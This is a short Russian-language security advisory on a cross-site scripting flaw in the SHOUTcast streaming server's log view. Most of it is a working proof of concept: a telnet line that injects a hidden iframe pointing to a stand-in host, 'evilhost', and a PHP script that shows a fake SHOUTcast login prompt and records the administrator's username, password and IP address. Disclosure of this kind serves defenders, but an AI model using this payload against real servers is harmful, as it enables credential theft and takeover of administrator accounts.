SHOUTcast - Winamp система потокового аудио от Nullsoft.
Уязвимость в проверке правильности ввода обнаружена в SHOUTcast сервере. Удаленный пользователь может выполнить XSS нападение против администратора SHOUTcast. Пример:
telnet localhost 8001
<IFrame src=http://evilhost/script.php width=0 height=0></iframe>changeme
Где script.php:
<?php
$fp = fopen("log.txt","a+");
if (!isset( $_SERVER["PHP_AUTH_USER"] )) {
header( 'WWW-Authenticate: Basic realm="Shoutcast Server"' );
header( 'HTTP/1.0 401 Unauthorized' );
echo '<HTML><HEAD>Unauthorized<title>SHOUTcast
Administrator</title></HEAD></HTML>';
exit;
} else {
fwrite($fp,'|' . $_SERVER["PHP_AUTH_USER"] . '|' .
$_SERVER["PHP_AUTH_PW"] . '|' . $_SERVER["REMOTE_ADDR"] . $content);
}
fclose($fp);
?>
Произвольный код сценария будет выполнен в браузере администратора системы, когда он
просматривает Log файлы в административном интерфейсе.